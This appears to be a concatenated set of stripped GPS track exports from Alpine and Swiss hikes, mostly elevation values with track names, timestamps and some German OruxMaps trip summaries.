+ + +2621.48 + +" +" + + + + + + +Garmin International + + + +2016-11-01 15:56:58 + + + + + + +312.55 + + + +313.64 + + + +313.79 + + + +315.31 + + + +319.49 + + + +325.27 + + + +345.38 + + + +370.54 + + + +377.77 + + + +404.65 + + + +408.44 + + + +415.87 + + + +430.78 + + + +437.57 + + + +443.26 + + + +446.47 + + + +444.6 + + + +449.58 + + + +455.33 + + + +450.9 + + + +445.66 + + + +447.06 + + + +444.76 + + + +445.72 + + + +412.94 + + + +414.02 + + + +421.61 + + + +434.34 + + + +456.23 + + + +461.21 + + + +457.97 + + + +455.12 + + + +451.8 + + + +444.21 + + + +433.05 + + + +420.47 + + + +414.78 + + + +410.62 + + + +409.46 + + + +403.0 + + + +383.36 + + + +381.14 + + + +382.56 + + + +391.24 + + + +393.31 + + + +382.01 + + + +390.38 + + + +385.46 + + + +382.52 + + + +371.51 + + + +365.15 + + + +358.92 + + + +351.86 + + + +356.42 + + + +359.11 + + + +354.85 + + + +344.73 + + + +335.38 + + + +326.07 + + + +324.65 + + + +328.7 + + + +334.71 + + + +327.73 + + + +316.96 + + + +315.45 + + + +314.15 + + + +313.61 + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + +1093.0 + + + +1093.0 + + + +1093.0 + + + +1093.0 + + + +1094.0 + + + +1096.0 + + + +1098.0 + + + +1103.0 + + + +1107.0 + + + +1115.0 + + + +1118.0 + + + +1134.0 + + + +1143.0 + + + +1150.0 + + + +1174.0 + + + +1198.0 + + + +1214.0 + + + +1228.0 + + + +1250.0 + + + +1279.0 + + + +1301.0 + + + +1317.0 + + + +1325.0 + + + +1331.0 + + + +1349.0 + + + +1368.0 + + + +1375.0 + + + +1382.0 + + + +1385.0 + + + +1392.0 + + + +1401.0 + + + +1418.0 + + + +1429.0 + + + +1447.0 + + + +1450.0 + + + +1454.0 + + + +1469.0 + + + +1472.0 + + + +1482.0 + + + +1487.0 + + + +1495.0 + + + +1514.0 + + + +1535.0 + + + +1559.0 + + + +1578.0 + + + +1591.0 + + + +1588.0 + + + +1615.0 + + + +1628.0 + + + +1638.0 + + + +1664.0 + + + +1678.0 + + + +1683.0 + + + +1697.0 + + + +1703.0 + + + +1712.0 + + + +1725.0 + + + +1729.0 + + + +1736.0 + + + +1749.0 + + + +1779.0 + + + +1794.0 + + + +1798.0 + + + +1806.0 + + + +1807.0 + + + +1806.0 + +" +" + + +Tourenplanung am 22. Juli 2016 + +TemporaryUserGroup + + + + + +Tourenplanung am 22. Juli 2016 + + + +261.1 + + +262.2 + + +262.7 + + +265.0 + + +266.6 + + +268.2 + + +273.4 + + +276.6 + + +279.3 + + +282.2 + + +268.0 + + +268.6 + + +265.9 + + +276.3 + + +276.5 + + +279.4 + + +280.0 + + +283.8 + + +280.1 + + +285.3 + + +288.5 + + +291.1 + + +290.5 + + +293.8 + + +308.4 + + +307.2 + + +306.6 + + +314.9 + + +309.6 + + +298.0 + + +294.7 + + +281.4 + + +279.3 + + +276.6 + + +273.4 + + +268.2 + + +266.6 + + +265.0 + + +262.7 + + +262.2 + + +261.1 +" +" + + + + + + + +2015-11-28 17:12:04 + + + +1463.69995117188 + + + +1464.69995117188 + + + +1466.63000488281 + + + +1516.14001464844 + + + +1526.7099609375 + + + +1529.58996582031 + + + +1539.2099609375 + + + +1555.55004882812 + + + +1574.30004882812 + + + +1586.31005859375 + + + +1589.68005371094 + + + +1622.35998535156 + + + +1650.23999023438 + + + +1672.34997558594 + + + +1683.89001464844 + + + +1705.0400390625 + + + +1723.78002929688 + + + +1737.71997070312 + + + +1755.98999023438 + + + +1780.02001953125 + + + +1788.67004394531 + + + +1792.52001953125 + + + +1795.88000488281 + + + +1801.65002441406 + + + +1821.83996582031 + + + +1838.66003417969 + + + +1862.2099609375 + + + +1865.57995605469 + + + +1875.67004394531 + + + +1885.76000976562 + + + +1898.26000976562 + + + +1911.23999023438 + + + +1938.64001464844 + + + +1943.43994140625 + + + +1954.97998046875 + + + +1962.67004394531 + + + +1965.55004882812 + + + +1978.53002929688 + + + +1994.39001464844 + + + +2002.56005859375 + + + +2023.7099609375 + + + +2039.56994628906 + + + +2086.19995117188 + + + +2110.10009765625 + + + +2077.07006835938 + + + +2062.169921875 + + + +2036.2099609375 + + + +2020.82995605469 + + + +2014.57995605469 + + + +2004.48999023438 + + + +1998.23999023438 + + + +1988.14001464844 + + + +1988.61999511719 + + + +1976.60998535156 + + + +1956.80004882812 + +" +" + + +Le Brandou + +Monika Teusch - Community + + + + + +Le Brandou + + + +177.2014 + + +181.46751 + + +186.62779 + + +190.34917 + + +192.61247 + + +196.02367 + + +197.14293 + + +199.08238 + + +206.08592 + + +207.34496 + + +210.09374 + + +213.02599 + + +227.08934 + + +234.75133 + + +242.26195 + + +259.68462 + + +263.05772 + + +270.93614 + + +280.27513 + + +286.97752 + + +290.60857 + + +309.79137 + + +311.95049 + + +312.69408 + + +313.50127 + + +326.02672 + + +326.59044 + + +326.74748 + + +326.04112 + + +321.17162 + + +317.26683 + + +314.78905 + + +311.09764 + + +313.62547 + + +318.80162 + + +319.71733 + + +331.77977 + + +330.192 + + +314.03172 + + +323.16905 + + +308.49596 + + +298.46733 + + +296.49699 + + +290.39012 + + +290.6682 + + +288.94115 + + +305.82427 + + +310.01329 + + +307.94603 + + +327.34032 + + +336.74229 + + +351.11034 + + +362.26012 + + +361.26152 + + +360.54186 + + +355.21947 + + +357.6057 + + +365.78868 + + +364.50218 + + +362.1118 + + +361.76146 + + +378.91155 + + +385.10033 + + +396.60362 + + +399.72789 + + +414.92967 + + +420.12376 + + +422.47258 + + +434.94139 + + +431.61723 + + +437.19115 + + +436.18187 + + +443.65672 + + +443.09581 + + +453.13329 + + +454.95519 + + +464.44438 + + +486.5388 + + +503.78453 + + +505.60484 + + +507.02049 + + +520.77635 + + +520.07726 + + +492.72557 + + +475.13475 + + +468.66692 + + +466.11095 + + +464.10112 +" +" + + +Emeindra + + + + + +OruxMaps + + + +Emeindra +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Emeindra</h2><br /><p>Startzeit: 06/02/2016 11:56</p><p>Zielzeit: 06/02/2016 13:36</p><p>Strecke: 5,3km (01:39)</p><p>Bewegungszeit: 01:15</p><p>Ø-Geschwindigkeit: 3,2km/h</p><p>Netto-Geschwindigkeit: 4,2km/h</p><p>Max. Geschwindigkeit: 7,8km/h</p><p>Minimale Höhe: 981m</p><p>Maximale Höhe: 1490m</p><p>Steig-Geschw.: 437,9m/h</p><p>Sink-Geschw.: -397m/h</p><p>Aufstieg: 565m</p><p>Abstieg: -56m</p><p>Steigzeit: 01:17</p><p>Sinkzeit: 00:08</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +981.44 + + + +987.13 + + + +990.85 + + + +998.88 + + + +998.87 + + + +1006.88 + + + +1005.13 + + + +1014.97 + + + +1014.75 + + + +1019.21 + + + +1025.82 + + + +1033.4 + + + +1034.26 + + + +1034.04 + + + +1054.75 + + + +1060.89 + + + +1074.61 + + + +1089.83 + + + +1085.27 + + + +1086.67 + + + +1089.9 + + + +1110.01 + + + +1153.5 + + + +1188.85 + + + +1191.28 + + + +1207.24 + + + +1214.88 + + + +1223.41 + + + +1238.75 + + + +1302.41 + + + +1320.76 + + + +1330.37 + + + +1331.0 + + + +1332.77 + + + +1329.89 + + + +1344.24 + + + +1349.81 + + + +1343.01 + + + +1349.0 + + + +1351.91 + + + +1358.01 + + + +1377.81 + + + +1391.97 + + + +1420.73 + + + +1433.37 + + + +1385.88 + + + +1431.87 + + + +1479.79 + + + +1488.22 + + + +1486.94 + +" +" + + + + + + + +Acquaviva1 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin Connect + + +Muottas Muragl + + + +1786.5999755859375 + + + +1789.800048828125 + + + +1814.800048828125 + + + +1843.5999755859375 + + + +1877.5999755859375 + + + +1893.4000244140625 + + + +1907.800048828125 + + + +1926.199951171875 + + + +1929.800048828125 + + + +1927.5999755859375 + + + +1951.199951171875 + + + +1952.4000244140625 + + + +1959.0 + + + +1969.5999755859375 + + + +1977.5999755859375 + + + +2041.4000244140625 + + + +2038.0 + + + +2057.199951171875 + + + +2072.0 + + + +2072.39990234375 + + + +2111.0 + + + +2122.39990234375 + + + +2191.800048828125 + + + +2168.60009765625 + + + +2165.199951171875 + + + +2212.39990234375 + + + +2191.39990234375 + + + +2209.39990234375 + + + +2212.800048828125 + + + +2229.800048828125 + + + +2260.39990234375 + + + +2268.199951171875 + + + +2289.39990234375 + + + +2313.60009765625 + + + +2341.39990234375 + + + +2354.800048828125 + + + +2387.39990234375 + + + +2395.39990234375 + + + +2403.199951171875 + + + +2408.39990234375 + + + +2426.60009765625 + + + +2443.800048828125 + + + +2451.60009765625 + +" +" + + + + + + + +Linie + + + +1708.5 + + +1708.7 + + +1708.7 + + +1706.9 + + +1707.3 + + +1708.2 + + +1709.0 + + +1709.7 + + +1712.8 + + +1715.6 + + +1714.0 + + +1714.0 + + +1714.7 + + +1716.0 + + +1717.0 + + +1721.4 + + +1717.1 + + +1717.8 + + +1718.2 + + +1718.4 + + +1727.8 + + +1725.0 + + +1720.9 + + +1727.6 + + +1725.2 + + +1718.5 + + +1718.0 + + +1714.3 + + +1714.5 + + +1709.0 + + +1709.5 + + +1709.3 + + +1708.9 + + +1709.6 + + +1706.3 + + +1704.9 + + +1700.0 + + +1700.3 + + +1702.0 + + +1703.6 + + +1707.3 + + +1704.7 + + +1703.6 + + +1700.6 + + +1698.8 + + +1700.5 + + +1696.3 + + +1696.0 + + +1695.7 + + +1695.9 + + +1694.9 + + +1703.0 + + +1699.3 + + +1694.6 + + +1695.7 + + +1695.0 + + +1697.3 + + +1699.8 + + +1703.2 + + +1706.3 + + +1708.9 + + +1710.8 + + +1711.8 + + +1712.4 + + +1720.3 + + +1731.4 + + +1727.0 + + +1733.0 + + +1734.4 + + +1738.6 + + +1742.5 + + +1747.7 + + +1754.9 + + +1756.8 + + +1760.4 + + +1760.9 + + +1770.3 + + +1764.7 + + +1759.1 + + +1757.3 + + +1751.8 + + +1756.8 + + +1754.8 + + +1753.2 + + +1744.1 + + +1747.0 + + +1738.5 + + +1735.9 + + +1730.9 + + +1727.6 + + +1726.1 + + +1729.5 + + +1712.0 + + +1708.3 + + +1708.5 +" +" + + +Uetliberg + + + + + + +Uetliberg + + +Walking + +c0c0c0 + + +524.0 + + + +537.0 + + + +543.0 + + + +518.0 + + + +523.0 + + + +523.0 + + + +525.0 + + + +530.0 + + + +550.0 + + + +551.0 + + + +561.0 + + + +581.0 + + + +587.0 + + + +611.0 + + + +621.0 + + + +614.0 + + + +640.0 + + + +650.0 + + + +673.0 + + + +682.0 + + + +684.0 + + + +707.0 + + + +709.0 + + + +701.0 + + + +725.0 + + + +729.0 + + + +734.0 + + + +773.0 + + + +778.0 + + + +797.0 + + + +784.0 + + + +797.0 + + + +820.0 + + + +846.0 + + + +854.0 + + + +851.0 + + + +879.0 + + + +899.0 + + + +872.0 + + + +855.0 + + + +840.0 + + + +829.0 + + + +832.0 + + + +827.0 + + + +824.0 + + + +828.0 + + + +817.0 + + + +810.0 + + + +805.0 + + + +797.0 + + + +791.0 + + + +793.0 + + + +786.0 + + + +742.0 + + + +729.0 + + + +759.0 + + + +721.0 + + + +717.0 + + + +706.0 + + + +694.0 + + + +684.0 + + + +704.0 + + + +688.0 + + + +684.0 + + + +669.0 + + + +673.0 + + + +658.0 + + + +625.0 + + + +615.0 + + + +591.0 + + + +583.0 + + + +559.0 + + + +556.0 + + + +545.0 + + + +528.0 + + + +534.0 + + + +526.0 + + + +522.0 + + + +522.0 + +" +" + + + + + + +Garmin International + + + +Rossstock - Wanderung + + + + + + +1647.837158203125 + + + +1691.09619140625 + + + +1697.344970703125 + + + +1710.32275390625 + + + +1718.974609375 + + + +1730.510498046875 + + + +1738.681640625 + + + +1742.04638671875 + + + +1739.162109375 + + + +1739.642822265625 + + + +1746.852783203125 + + + +1750.697998046875 + + + +1775.6923828125 + + + +1786.266845703125 + + + +1789.15087890625 + + + +1792.034912109375 + + + +1805.0126953125 + + + +1816.54833984375 + + + +1818.470947265625 + + + +1831.929443359375 + + + +1842.984619140625 + + + +1861.249755859375 + + + +1874.708251953125 + + + +1891.53125 + + + +1899.702392578125 + + + +1903.067138671875 + + + +1922.774169921875 + + + +1936.232666015625 + + + +1955.458984375 + + + +1967.9560546875 + + + +1984.779296875 + + + +2013.61865234375 + + + +2017.4638671875 + + + +2077.54638671875 + + + +2083.314208984375 + + + +2091.966064453125 + + + +2096.292236328125 + + + +2109.75048828125 + + + +2113.115234375 + + + +2127.534912109375 + + + +2129.938232421875 + + + +2152.529052734375 + + + +2197.711181640625 + + + +2223.186279296875 + + + +2230.876708984375 + + + +2249.1416015625 + + + +2259.235595703125 + + + +2270.290771484375 + + + +2295.284912109375 + + + +2298.6494140625 + + + +2327.489013671875 + + + +2338.54443359375 + + + +2375.07421875 + + + +2381.8037109375 + + + +2400.54931640625 + + + +2449.57666015625 + + + +2461.59326171875 + +" +" + + +KOMPASS Digital Map Track + + + + + + + +Grün + + + + + + +1536.28 + + + +1521.65 + + + +1529.66 + + + +1537.48 + + + +1529.66 + + + +1535.48 + + + +1537.79 + + + +1541.25 + + + +1563.41 + + + +1566.54 + + + +1583.98 + + + +1578.81 + + + +1580.49 + + + +1592.8 + + + +1588.78 + + + +1588.76 + + + +1599.48 + + + +1618.0 + + + +1627.06 + + + +1625.15 + + + +1638.83 + + + +1645.26 + + + +1648.31 + + + +1646.7 + + + +1655.4 + + + +1638.84 + + + +1653.95 + + + +1642.12 + + + +1642.52 + + + +1623.95 + + + +1623.82 + + + +1603.47 + + + +1588.06 + + + +1571.04 + + + +1568.27 + + + +1560.51 + + + +1554.15 + + + +1513.74 + + + +1536.63 + + + +1533.5 + + + +1520.49 + + + +1504.38 + + + +1480.02 + + + +1483.19 + + + +1461.87 + + + +1454.75 + + + +1443.75 + + + +1442.27 + + + +1446.11 + + + +1459.82 + + + +1467.43 + + + +1472.47 + + + +1485.13 + + + +1490.27 + + + +1508.38 + + + +1506.84 + + + +1528.63 + + + +1532.87 + + + +1527.76 + + + +1538.2 + + + +1523.53 + + + +1529.76 + +" +" + + +Rocciamelone + + + + + +OruxMaps + + + +Rocciamelone +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Rocciamelone</h2><br /><p>Startzeit: 08/25/2015 06:58</p><p>Zielzeit: 08/25/2015 10:15</p><p>Strecke: 4,5km (03:16)</p><p>Bewegungszeit: 01:55</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,4km/h</p><p>Max. Geschwindigkeit: 7,3km/h</p><p>Minimale Höhe: 2137m</p><p>Maximale Höhe: 3527m</p><p>Steig-Geschw.: 503,1m/h</p><p>Sink-Geschw.: -358,4m/h</p><p>Aufstieg: 1335m</p><p>Abstieg: -29m</p><p>Steigzeit: 02:39</p><p>Sinkzeit: 00:04</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2171.28 + + + +2169.08 + + + +2144.67 + + + +2151.22 + + + +2165.21 + + + +2175.3 + + + +2180.0 + + + +2201.84 + + + +2227.03 + + + +2253.26 + + + +2276.77 + + + +2283.28 + + + +2303.89 + + + +2318.43 + + + +2343.67 + + + +2354.97 + + + +2371.71 + + + +2447.77 + + + +2470.3 + + + +2482.66 + + + +2517.49 + + + +2565.38 + + + +2572.77 + + + +2606.25 + + + +2622.89 + + + +2633.15 + + + +2648.28 + + + +2683.29 + + + +2702.65 + + + +2732.02 + + + +2749.27 + + + +2763.27 + + + +2771.27 + + + +2800.89 + + + +2804.8 + + + +2813.24 + + + +2836.65 + + + +2906.86 + + + +2948.18 + + + +3009.3 + + + +3024.36 + + + +3070.65 + + + +3078.4 + + + +3113.76 + + + +3150.27 + + + +3153.02 + + + +3183.4 + + + +3198.24 + + + +3253.9 + + + +3259.61 + + + +3273.77 + + + +3355.3 + + + +3419.64 + + + +3432.76 + + + +3493.77 + + + +3515.2 + + + +3527.27 + +" +" + + + + + + +Garmin International + + +2014-08-10 14:02:15 + + + + + + +374.1 + + + +369.38 + + + +370.52 + + + +371.27 + + + +373.32 + + + +377.55 + + + +381.06 + + + +385.11 + + + +381.63 + + + +386.53 + + + +382.56 + + + +381.96 + + + +382.51 + + + +384.19 + + + +385.23 + + + +390.85 + + + +392.12 + + + +393.3 + + + +395.31 + + + +396.95 + + + +402.48 + + + +397.39 + + + +394.92 + + + +393.93 + + + +391.34 + + + +390.21 + + + +389.89 + + + +388.49 + + + +383.16 + + + +381.9 + + + +378.45 + + + +378.27 + + + +379.52 + + + +382.57 + + + +376.96 + + + +380.46 + + + +376.62 + + + +374.7 + + + +369.53 + + + +367.68 + + + +366.33 + + + +368.3 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +2016-02-27_14-00_sa. + + + + +2016-02-27_14-00_sa. on GPSies.com + + +2016-02-27_14-00_sa. on GPSies.com + + + +792.08999 + + + +759.78999 + + + +732.18999 + + + +725.48999 + + + +710.68999 + + + +720.18999 + + + +773.18999 + + + +789.18999 + + + +811.68999 + + + +789.28999 + + + +782.58999 + + + +751.58999 + + + +730.98999 + + + +707.18999 + + + +689.88999 + + + +666.78999 + + + +649.28999 + + + +632.38999 + + + +631.08999 + + + +626.98999 + + + +622.58999 + + + +617.98999 + + + +595.18999 + + + +588.58999 + + + +582.38999 + + + +567.68999 + + + +588.58999 + + + +588.38999 + + + +589.08999 + + + +592.58999 + + + +584.38999 + + + +575.58999 + + + +576.38999 + + + +568.68999 + + + +558.98999 + + + +544.98999 + + + +540.88999 + + + +527.58999 + + + +524.38999 + + + +526.38999 + + + +534.58999 + + + +524.18999 + + + +504.38999 + +" +" + + +belchenflue + + +849.7773438 + +867.0234375 + +892.9726563 + +896.546875 + +895.1601563 + +907.4726563 + +918.0351563 + +945.1757813 + +964.328125 + +968.328125 + +965.953125 + +982.2851563 + +978.984375 + +965.5820313 + +976.5273438 + +982.7226563 + +987.671875 + +996.3242188 + +955.0820313 + +992.7851563 + +994.2929688 + +1025.9296875 + +1059.8203125 + +1052.8554688 + +1049.0351563 + +1037.9414063 + +1040.9296875 + +933.96875 + +937.6171875 + +931.2929688 + +925.125 + +923.609375 + +920.9492188 + +922.3359375 + +921.546875 + +918.8984375 + +875.6953125 + +876.46875 + +878.8984375 + +871.671875 + +871.0390625 + +870.2148438 + +851.2304688 + +846.390625 + +832.1796875 + +824.0820313 + +779.0039063 + +757.5703125 + +745.3125 + +728.5195313 + +706.7421875 + +705.9257813 + +703.9960938 + +702.09375 + +711.359375 + +728.015625 + +744.8046875 + +756.21875 + +757.9492188 + +768.3867188 + +775.59375 + +799.7070313 + +837.1289063 + +841.75 + +843.4023438 + +841.9648438 + +840.5898438 + +830.953125 + +808.4257813 + +814.9921875 + +818.53125 + +824.8554688 + +828.0039063 + +832.734375 + +842.3085938 + +836.6289063 + +837.9296875 + +843.59375 + +850.359375" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +1114.0 + + + +1121.0 + + + +1170.0 + + + +1228.0 + + + +1297.0 + + + +1302.0 + + + +1329.0 + + + +1364.0 + + + +1381.0 + + + +1406.0 + + + +1447.0 + + + +1465.0 + + + +1464.0 + + + +1484.0 + + + +1469.0 + + + +1475.0 + + + +1492.0 + + + +1483.0 + + + +1511.0 + + + +1533.0 + + + +1545.0 + + + +1547.0 + + + +1561.0 + + + +1558.0 + + + +1582.0 + + + +1596.0 + + + +1611.0 + + + +1650.0 + + + +1681.0 + + + +1722.0 + + + +1726.0 + + + +1737.0 + + + +1821.0 + + + +1854.0 + + + +1907.0 + + + +1910.0 + + + +1923.0 + + + +1974.0 + + + +2028.0 + + + +2061.0 + + + +2089.0 + + + +2100.0 + + + +2115.0 + + + +2128.0 + + + +2138.0 + + + +2153.0 + + + +2138.0 + + + +2128.0 + + + +2116.0 + + + +2099.0 + + + +2089.0 + + + +2061.0 + + + +2100.0 + + + +2128.0 + + + +2093.0 + + + +2059.0 + + + +2004.0 + + + +1949.0 + + + +1925.0 + + + +1924.0 + + + +1932.0 + + + +1932.0 + + + +1939.0 + + + +1952.0 + + + +1974.0 + + + +1949.0 + + + +1934.0 + +" +" + + + + + + + + + + +536.400024414062 + + + +535.799987792969 + + + +531.799987792969 + + + +529.599975585938 + + + +539.799987792969 + + + +561.400024414062 + + + +581.599975585938 + + + +602.200012207031 + + + +616.799987792969 + + + +636.799987792969 + + + +645.200012207031 + + + +668.400024414062 + + + +694.799987792969 + + + +714.799987792969 + + + +729.200012207031 + + + +745.599975585938 + + + +771.799987792969 + + + +808.0 + + + +836.400024414062 + + + +888.599975585938 + + + +896.200012207031 + + + +909.599975585938 + + + +930.200012207031 + + + +943.200012207031 + + + +960.0 + + + +970.400024414062 + + + +973.400024414062 + + + +991.799987792969 + + + +1028.0 + + + +1040.0 + + + +1090.59997558594 + + + +1172.40002441406 + + + +1198.80004882812 + + + +1205.59997558594 + + + +1220.19995117188 + + + +1228.80004882812 + + + +1252.19995117188 + + + +1258.19995117188 + + + +1351.0 + + + +1362.0 + + + +1537.0 + + + +1531.19995117188 + + + +1505.80004882812 + + + +1535.19995117188 + + + +1530.59997558594 + + + +1585.80004882812 + + + +1611.80004882812 + + + +1655.80004882812 + + + +1678.59997558594 + + + +1687.40002441406 + + + +1679.59997558594 + + + +1661.59997558594 + + + +1682.59997558594 + + + +1725.40002441406 + + + +1729.59997558594 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +Moltinden-696m 001 + + + + + + +34.30859375 + + + +83.03515625 + + + +124.76171875 + + + +183.796875 + + + +197.4375 + + + +219.3125 + + + +207.0078125 + + + +237.41015625 + + + +251.98828125 + + + +261.35546875 + + + +270.83203125 + + + +266.55859375 + + + +283.80859375 + + + +305.26953125 + + + +320.03125 + + + +323.91015625 + + + +330.64453125 + + + +354.8828125 + + + +381.26953125 + + + +385.03515625 + + + +377.4765625 + + + +387.59765625 + + + +415.28125 + + + +438.703125 + + + +424.484375 + + + +477.17578125 + + + +481.1171875 + + + +527.36328125 + + + +581.3359375 + + + +605.3046875 + + + +624.39453125 + + + +641.94140625 + + + +674.625 + + + +657.7890625 + + + +673.15234375 + + + +639.79296875 + + + +630.33984375 + + + +601.9609375 + + + +588.30859375 + + + +519.67578125 + + + +477.87109375 + + + +424.46484375 + + + +430.58984375 + + + +367.5 + + + +331.65234375 + + + +320.72265625 + + + +289.734375 + + + +267.765625 + + + +258.64453125 + + + +253.0625 + + + +222.08984375 + + + +218.6875 + + + +200.23828125 + + + +185.4609375 + + + +171.48828125 + + + +117.6328125 + + + +76.87890625 + + + +50.91015625 + + + +40.6484375 + + + +14.7734375 + + + +2.93359375 + +" +" + + + + + + +Garmin International + + +2014-11-01 15:54:30 + + + + + +1454.13 + + + +1460.86 + + + +1477.68 + + + +1480.09 + + + +1481.05 + + + +1513.25 + + + +1520.46 + + + +1532.96 + + + +1552.67 + + + +1594.96 + + + +1603.14 + + + +1640.15 + + + +1646.4 + + + +1669.47 + + + +1677.64 + + + +1822.8 + + + +1840.58 + + + +1825.2 + + + +1828.56 + + + +1834.33 + + + +1852.6 + + + +1879.03 + + + +1907.87 + + + +1924.22 + + + +1918.45 + + + +1921.33 + + + +1919.41 + + + +1921.33 + + + +1932.39 + + + +1959.3 + + + +1966.99 + + + +1980.93 + + + +1974.69 + + + +1967.48 + + + +1947.29 + + + +1943.92 + + + +1944.4 + + + +1945.36 + + + +1958.34 + + + +1954.98 + + + +1971.8 + + + +1981.41 + + + +2000.16 + + + +1997.28 + + + +2042.94 + + + +2041.98 + + + +2065.05 + + + +2085.24 + + + +2089.56 + + + +2095.81 + + + +2117.92 + + + +2120.32 + + + +2124.17 + + + +2119.84 + + + +2117.44 + + + +2094.37 + + + +2074.18 + + + +2073.7 + + + +2070.82 + +" +" + + +pitzenegg + + + + + +OruxMaps + + + +pitzenegg +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: pitzenegg</h2><br /><p>Startzeit: 07/30/2015 12:40</p><p>Zielzeit: 07/30/2015 15:42</p><p>Strecke: 4,1km (03:01)</p><p>Bewegungszeit: 01:12</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 3,4km/h</p><p>Max. Geschwindigkeit: 5,2km/h</p><p>Minimale Höhe: 1108m</p><p>Maximale Höhe: 2180m</p><p>Steig-Geschw.: 377,6m/h</p><p>Sink-Geschw.: -239m/h</p><p>Aufstieg: 1086m</p><p>Abstieg: -27m</p><p>Steigzeit: 02:52</p><p>Sinkzeit: 00:06</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1118.64 + + + +1112.82 + + + +1110.96 + + + +1126.43 + + + +1131.97 + + + +1131.95 + + + +1162.43 + + + +1177.9 + + + +1193.81 + + + +1191.94 + + + +1190.95 + + + +1198.87 + + + +1238.97 + + + +1246.9 + + + +1272.35 + + + +1294.68 + + + +1291.95 + + + +1337.84 + + + +1348.03 + + + +1419.81 + + + +1448.93 + + + +1500.93 + + + +1508.78 + + + +1557.7 + + + +1555.18 + + + +1552.91 + + + +1568.8 + + + +1575.91 + + + +1590.47 + + + +1595.4 + + + +1605.9 + + + +1614.8 + + + +1634.86 + + + +1629.49 + + + +1652.24 + + + +1716.04 + + + +1752.06 + + + +1765.39 + + + +1767.78 + + + +1798.9 + + + +1828.97 + + + +1857.55 + + + +1866.97 + + + +1873.76 + + + +1881.93 + + + +1887.21 + + + +1906.71 + + + +1920.92 + + + +1959.3 + + + +2004.87 + + + +2047.8 + + + +2159.33 + + + +2180.93 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +2015-12-04 14:09:52 + + + + + + +1176.79 + + + +1211.4 + + + +1236.87 + + + +1253.7 + + + +1270.04 + + + +1273.4 + + + +1284.94 + + + +1342.14 + + + +1365.69 + + + +1380.59 + + + +1393.57 + + + +1400.78 + + + +1416.16 + + + +1421.93 + + + +1428.66 + + + +1432.98 + + + +1448.84 + + + +1458.94 + + + +1579.1 + + + +1610.35 + + + +1635.34 + + + +1662.26 + + + +1692.06 + + + +1708.88 + + + +1712.73 + + + +1718.97 + + + +1712.25 + + + +1708.88 + + + +1690.62 + + + +1671.87 + + + +1668.51 + + + +1662.26 + + + +1662.26 + + + +1631.98 + + + +1623.32 + + + +1614.67 + + + +1614.67 + + + +1596.41 + + + +1565.16 + + + +1555.07 + + + +1548.82 + + + +1525.27 + + + +1489.7 + + + +1477.2 + + + +1470.47 + + + +1454.13 + + + +1448.84 + + + +1430.1 + + + +1419.04 + + + +1408.47 + + + +1388.28 + + + +1345.98 + + + +1319.07 + + + +1271.96 + + + +1258.5 + + + +1245.53 + + + +1230.62 + + + +1212.36 + + + +1202.27 + + + +1178.71 + + + +1167.18 + + + +1157.56 + + + +1129.69 + + + +1112.86 + + + +1102.77 + + + +1097.48 + +" +" + + + + + + +Best Mountain Artists - Tourenplanung Wandern Trekking Outdoor + + + +Slættaratindur + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Umbrail + + + + + +OruxMaps + + + +Umbrail +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Umbrail</h2><br /><p>Startzeit: 08/18/2015 08:00</p><p>Zielzeit: 08/18/2015 09:29</p><p>Strecke: 2,7km (01:29)</p><p>Bewegungszeit: 00:53</p><p>Ø-Geschwindigkeit: 1,8km/h</p><p>Netto-Geschwindigkeit: 3km/h</p><p>Max. Geschwindigkeit: 6,8km/h</p><p>Minimale Höhe: 2496m</p><p>Maximale Höhe: 3029m</p><p>Steig-Geschw.: 396,5m/h</p><p>Sink-Geschw.: -342,9m/h</p><p>Aufstieg: 538m</p><p>Abstieg: -45m</p><p>Steigzeit: 01:21</p><p>Sinkzeit: 00:07</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2532.01 + + + +2498.89 + + + +2499.37 + + + +2500.85 + + + +2521.41 + + + +2523.35 + + + +2549.45 + + + +2563.47 + + + +2583.38 + + + +2590.84 + + + +2597.37 + + + +2608.23 + + + +2612.25 + + + +2615.25 + + + +2623.48 + + + +2630.51 + + + +2643.89 + + + +2644.88 + + + +2673.01 + + + +2683.49 + + + +2714.01 + + + +2720.2 + + + +2751.76 + + + +2759.51 + + + +2791.42 + + + +2807.91 + + + +2853.38 + + + +2872.78 + + + +2878.75 + + + +2892.38 + + + +2904.92 + + + +2913.88 + + + +2947.28 + + + +2967.76 + + + +2965.26 + + + +2979.38 + + + +2988.88 + + + +3010.88 + + + +3029.38 + + + +3024.85 + +" +" + + + + + + +Garmin International + + +2015-04-09 18:16:18 + + + + + + +814.75 + + + +820.72 + + + +868.15 + + + +890.66 + + + +946.51 + + + +975.96 + + + +1018.07 + + + +1047.62 + + + +1075.66 + + + +1097.55 + + + +1115.53 + + + +1161.47 + + + 